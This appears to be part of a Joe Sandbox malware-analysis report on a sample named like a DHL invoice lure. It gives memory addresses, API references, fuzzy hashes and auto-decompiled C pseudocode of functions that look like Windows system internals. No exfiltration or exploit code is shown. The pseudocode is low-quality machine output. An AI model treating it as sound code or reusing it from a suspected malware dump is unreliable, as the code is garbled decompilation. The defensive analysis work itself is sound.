0x1d81edb0
0x00000000
0x1d81edb2
0x1d81edb2
0x1d81edb8
0x1d81edbd
0x00000000
0x1d81edbd
0x1d81edb0
0x1d81ed96
0x1d81ed7c
0x1d81ed58
0x1d81ed41
0x1d81ecfc
0x1d81ecfc
0x1d81ed01
0x1d81edca
0x1d81edca
0x1d81edcd
0x1d81edd0
0x1d81edd1
0x1d81edd4
0x1d81edd8
0x00000000
0x1d81edd8
0x1d81ecce
0x1d81ecce
0x1d81edf2
0x1d81edf2
0x1d81edf2
0x1d81eccc
0x00000000
0x1d81ecc1
0x00000000
0x1d81edde
0x1d81ec9d
0x1d81edf5
0x1d81edf5
0x1d81edfc
0x1d81ee04
0x1d81ee04
0x1d81ee47
0x1d81ee53

APIs

RtlDebugPrintTimes.NTDLL ref: 1D81EC61
RtlDebugPrintTimes.NTDLL ref: 1D81EC89
RtlDebugPrintTimes.NTDLL ref: 1D81ED2C
RtlDebugPrintTimes.NTDLL ref: 1D81EDE0

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 64d5bc23a895e5965b99da66c7dfbda17ddcd083e7d1ef5d83fb5d03db5cb4ae
Instruction ID: f6d2747dd4d868223b529199495a8106a87337b04b5f5dc1d12c53b9c6fb9269
Opcode Fuzzy Hash: 64d5bc23a895e5965b99da66c7dfbda17ddcd083e7d1ef5d83fb5d03db5cb4ae
Instruction Fuzzy Hash: C0711A75E002299FDF06CFA8D884AEDBBB5FF48354F15802AE905EB290D734A909CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1D87A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1D87A0F7
RtlDebugPrintTimes.NTDLL ref: 1D87A1AA
RtlDebugPrintTimes.NTDLL ref: 1D87A1CE
RtlDebugPrintTimes.NTDLL ref: 1D87A1E3

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e960dfc5eb59b15417c7d536ce552b1253863a4f98efd45f4203dc7d08694972
Instruction ID: 080244ec559f7097ef18530ce606791dd4f08b7a0dac660c54d87202a5acc52b
Opcode Fuzzy Hash: e960dfc5eb59b15417c7d536ce552b1253863a4f98efd45f4203dc7d08694972
Instruction Fuzzy Hash: C5517935704616DFEB09CF98C8E0A2AB7E1BB89710B10456DE90ECB720DB71EC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D81EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1D81EEED
RtlDebugPrintTimes.NTDLL ref: 1D81EF12
RtlDebugPrintTimes.NTDLL ref: 1D81EFA4
RtlDebugPrintTimes.NTDLL ref: 1D81EFF8

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: dfdd1888ab1f0798e367306347c164b74f7fb9722fa20227ddf54f1b273b2dfd
Instruction ID: 0fc9a8c340c8937482e6d1453fde136d3a9896a8e9f1c0dc7ad3828f1878294d
Opcode Fuzzy Hash: dfdd1888ab1f0798e367306347c164b74f7fb9722fa20227ddf54f1b273b2dfd
Instruction Fuzzy Hash: 7F511372E002199FDF09CF98D844AEDBBB2FF48350F15812AE815AB290D735A909CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1D7D7A4F Relevance: 6.1, APIs: 4, Instructions: 81
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E1D7D7A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x1d87c840);
				E1D7F7BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x1d895a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x1d8991e0();
					E1D7DB490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x1d895d38; // 0xf95b5812
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x1d8965fc; // 0x658cb258
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E1D7E2B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E1D7F8AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x1d8965fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x1d8965fc; // 0x658cb258
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E1D858890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7750b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x1d8991e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x1d8991e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}

0x1d7d7a4f
0x1d7d7a4f
0x1d7d7a4f
0x1d7d7a51
0x1d7d7a56
0x1d7d7a5b
0x1d7d7a5d
0x1d7d7a61
0x1d7d7a67
0x1d7d7a6a
0x1d8147f8
0x1d814801
0x1d814806
0x1d81480d
0x1d814810
0x1d814813
0x1d814818
0x1d81481d
0x1d814823
0x1d814825
0x1d814826
0x1d81482b
0x1d81482c
0x1d81482e
0x1d814835
0x1d814838
0x1d81483b
0x1d814840
0x1d814840
0x1d814848
0x1d814848
0x1d81484d
0x1d814852
0x1d81485b
0x1d814863
0x1d814865
0x1d81486b
0x1d81486b
0x1d81486e
0x1d814871
0x1d814892
0x1d814895
0x1d814873
0x1d81487b
0x1d814881
0x1d814881
0x1d814898
0x1d81489e
0x1d7d7a70
0x1d7d7a72
0x1d7d7a7c
0x1d8148ac
0x1d8148b6
0x1d8148c2
0x1d8148c2

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7D7A72
BaseThreadInitThunk.KERNEL32 ref: 1D7D7A7C
RtlDebugPrintTimes.NTDLL ref: 1D8147F8
RtlDebugPrintTimes.NTDLL ref: 1D81487B

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 45395a05bfeb298fb83cd2a1039c848e577fa6d5b7d9adc5bcdf4a543836ffb1
Instruction ID: 3dc3ebc37db633015c1e5f1edeee83272cfc4613227a8eafa2c9856d3afcba68
Opcode Fuzzy Hash: 45395a05bfeb298fb83cd2a1039c848e577fa6d5b7d9adc5bcdf4a543836ffb1
Instruction Fuzzy Hash: 21310275E00269DFCF09DFA8D888A9DBBB0BB8C760F10416AE511AB390D7346900CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1D7A58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1D7A58E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x1d87bd28);
				_push(E1D7EAD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x1d89b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E1D7A8120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E1D7A80BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E1D7A8009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E1D7E8F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L1D7A53C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E1D7A6055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E1D7A6074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E1D7A6179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E1D7DB490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E1D7B3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E1D7A63CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L1D7B2330(_t268, _t377 + 0x2c);
										E1D874407(_t377);
										E1D7B24D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E1D7A64F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x1d896644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E1D7B5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E1D7E46E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E1D7E8F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E1D7A6D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E1D7A6D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E1D7A6E00;
											if(_t342 == E1D7A6E00) {
												E1D7A6E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E1D7A61C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E1D7E43A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L1D7B2330(_t288, _t377 + 0x2c);
														E1D874407(_t377);
														E1D7B24D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - L1D7A7290;
											if(_t342 != L1D7A7290) {
												__eflags = _t342 - E1D7A5570;
												if(_t342 != E1D7A5570) {
													 *0x1d8991e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E1D7A5570( &_v216);
												goto L33;
											}
											L1D7A7290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E1D7A6970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E1D79BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E1D7A6929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E1D7A6B70) {
											__eflags = _t384 - E1D7A56E0;
											if(_t384 != E1D7A56E0) {
												 *0x1d8991e0();
												 *_t384();
											} else {
												E1D7A56E0(_t361);
											}
										} else {
											E1D7A6B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E1D7A7F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L1D7B2330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E1D7B24D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E1D7E8F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E1D7A4A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E1D7E29A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}

0x1d7a58e0
0x1d7a58e0
0x1d7a58e0
0x1d7a58e5
0x1d7a58e7
0x1d7a58ec
0x1d7a58f7
0x1d7a58f8
0x1d7a58fe
0x1d7a5903
0x1d7a5906
0x1d7a5908
0x1d7a590b
0x1d7a590c
0x1d7a590d
0x1d7a590e
0x1d7a5912
0x1d7a5918
0x1d7a591b
0x1d7a591e
0x1d7a5928
0x1d7a592e
0x1d7a5935
0x1d7a593c
0x1d7a5943
0x1d7a594a
0x1d7a5951
0x1d7a5958
0x1d7a595f
0x1d7a5966
0x1d7a5970
0x1d7a597a
0x1d7a5985
0x1d7a598b
0x1d7a5998
0x1d7a599d
0x1d7a59a3
0x1d7a59a8
0x1d7a59b0
0x1d7a59b2
0x1d7a59b8
0x1d7a59b8
0x1d7a59c8
0x1d7a59cd
0x1d7a59d0
0x1d7a59d7
0x1d7a59e5
0x1d7a59ea
0x1d7a59f8
0x1d800745
0x1d80074f
0x1d80074f
0x1d800756
0x1d7a5a25
0x1d7a5a25
0x1d7a5a2c
0x1d7a5a31
0x1d7a5a38
0x1d7a5fef
0x1d7a5fef
0x1d7a5ff6
0x1d7a5ffb
0x1d7a6002
0x1d7a6007
0x1d7a6007
0x1d7a6009
0x1d7a600f
0x1d7a6017
0x1d7a601c
0x1d7a601c
0x1d7a5b95
0x1d7a5b99
0x1d7a5f2d
0x1d7a5f32
0x1d7a5f36
0x1d7a5f36
0x1d7a5ba1
0x1d7a5fcf
0x1d7a5fcf
0x1d7a5fd4
0x00000000
0x00000000
0x1d7a5fd6
0x1d7a5fd6
0x1d7a5fd9
0x1d8007dc
0x1d8007e3
0x1d8007e5
0x1d8007ea
0x00000000
0x1d8007ea
0x1d7a5fdf
0x1d7a5fe2
0x00000000
0x00000000
0x1d7a5fe8
0x00000000
0x1d7a5ba7
0x1d7a5ba9
0x1d7a5e71
0x1d7a5e77
0x1d7a5e79
0x1d7a5bb4
0x1d7a5bba
0x1d800836
0x1d80083a
0x1d800841
0x1d800847
0x1d800847
0x1d7a5bd4
0x1d7a5bda
0x1d7a5be0
0x1d7a5be7
0x00000000
0x1d7a5bed
0x1d7a5bf3
0x1d7a5ae0
0x1d7a5ae0
0x1d7a5aec
0x1d7a5aef
0x1d7a5af2
0x1d7a5af5
0x1d7a5af8
0x1d7a5afb
0x1d7a5b07
0x1d7a5f69
0x1d7a5f73
0x1d7a5f8b
0x1d7a5f90
0x1d7a5f92
0x1d80077f
0x1d80077f
0x1d800789
0x1d7a5b43
0x1d7a5b43
0x1d7a5b49
0x1d7a5b53
0x1d7a5b5a
0x1d7a5b5d
0x1d7a5b66
0x1d7a5b67
0x1d7a5b6d
0x1d7a5b6e
0x1d7a5b74
0x1d7a5b7a
0x1d7a5b7b
0x1d7a5b80
0x1d7a5b86
0x1d7a5b8f
0x00000000
0x00000000
0x00000000
0x1d7a5b8f
0x1d7a5f98
0x1d7a5f98
0x1d7a5f9e
0x1d7a5fa0
0x1d7a5fa7
0x1d7a5fae
0x1d7a5fb1
0x00000000
0x1d7a5fb1
0x1d7a5b13
0x00000000
0x00000000
0x1d7a5b19
0x1d7a5b30
0x1d7a5b35
0x1d7a5b3b
0x1d7a5b41
0x00000000
0x1d7a5b41
0x1d7a5bf9
0x1d7a5bfe
0x1d7a5e84
0x1d7a5e8d
0x1d7a5e93
0x1d7a5ea1
0x1d7a5ea9
0x1d7a5eb4
0x1d7a5eb9
0x1d7a5ec0
0x1d7a5ec6
0x1d7a5ec7
0x1d7a5ed0
0x1d7a5ed1
0x1d7a5ed2
0x1d7a5ed8
0x1d7a5f15
0x1d7a5d52
0x1d7a5d52
0x1d7a5d59
0x1d7a5d60
0x1d800909
0x1d800909
0x1d7a5d6d
0x1d7a5d74
0x1d7a5d81
0x1d7a5d86
0x1d7a5d8d
0x1d7a5d9e
0x1d800955
0x1d800958
0x1d80095e
0x1d800960
0x1d800963
0x1d800969
0x1d800969
0x1d80096f
0x1d80096f
0x1d80096f
0x1d80096f
0x1d800971
0x1d800977
0x1d800979
0x1d800989
0x1d800992
0x1d800998
0x1d80099c
0x1d80099e
0x1d8009a4
0x1d8009a6
0x1d8009ac
0x1d8009ac
0x1d8009b4
0x1d8009b4
0x1d8009bc
0x1d8009c6
0x1d8009ce
0x1d8009cf
0x1d8009d1
0x1d8009d4
0x1d7a5da4
0x1d7a5da4
0x1d7a5dac
0x1d7a5f0b
0x1d7a5f0b
0x1d7a5db8
0x1d8009e2
0x1d8009e9
0x1d8009ef
0x1d8009ef
0x1d7a5dbe
0x1d7a5dc1
0x1d7a5dc7
0x1d7a5dc9
0x1d7a5dcc
0x1d7a5dd2
0x1d7a5de0
0x1d7a5de0
0x1d7a5de2
0x1d7a5de8
0x1d7a5dea
0x1d7a5df0
0x1d7a5df3
0x1d7a5e00
0x00000000
0x00000000
0x1d7a5e08
0x1d7a5eec
0x1d7a5eef
0x1d8009f9
0x1d800a00
0x00000000
0x00000000
0x1d800a06
0x1d7a5ef7
0x1d7a5f00
0x1d7a5e29
0x1d7a5e29
0x1d7a5e2c
0x1d7a5e34
0x1d7a5e38
0x1d7a5e3a
0x1d7a5e40
0x1d7a5e42
0x1d7a5e4e
0x00000000
0x1d7a5e58
0x1d7a5e58
0x1d7a5e5e
0x1d7a5e66
0x00000000
0x00000000
0x00000000
0x1d7a5e6c
0x1d7a5e4e
0x1d7a5e0e
0x1d7a5e0e
0x1d7a5e21
0x1d7a5e23
0x00000000
0x1d7a5e23
0x1d7a5de0
0x00000000
0x1d7a5d9e
0x1d7a5eda
0x1d7a5ee0
0x1d7a5f53
0x1d7a5f59
0x1d7a602d
0x1d7a6033
0x1d7a6035
0x00000000
0x1d7a6035
0x1d7a5f5f
0x00000000
0x1d7a5f5f
0x1d7a5ee2
0x00000000
0x1d7a5ee2
0x1d7a5c04
0x1d7a5c0a
0x1d7a5c0b
0x1d7a5c11
0x1d7a5c1a
0x00000000
0x00000000
0x1d7a5c24
0x1d7a6047
0x1d7a604c
0x1d7a604c
0x1d7a5c2a
0x1d7a5c30
0x1d7a5c3a
0x1d7a5c40
0x1d7a5c4c
0x1d7a5c52
0x1d7a5c5f
0x1d7a5c68
0x1d7a5c71
0x1d7a5c7a
0x1d7a5c7d
0x1d7a5c85
0x1d7a5c9e
0x1d7a5ca1
0x1d7a5ca7
0x1d7a5cad
0x1d7a5cba
0x1d80087c
0x1d7a5cc0
0x1d7a5cc0
0x1d7a5cc0
0x1d7a5cc4
0x1d800886
0x1d800889
0x1d800889
0x1d7a5cd1
0x1d800897
0x1d800897
0x1d7a5cf0
0x1d8008a2
0x1d8008a2
0x1d7a5cf6
0x1d7a5cfc
0x1d7a5d09
0x1d8008ae
0x1d8008ae
0x1d7a5d0f
0x1d7a5d15
0x1d7a5d22
0x1d8008ba
0x1d8008ba
0x1d7a5d22
0x1d7a5d28
0x1d7a5d2f
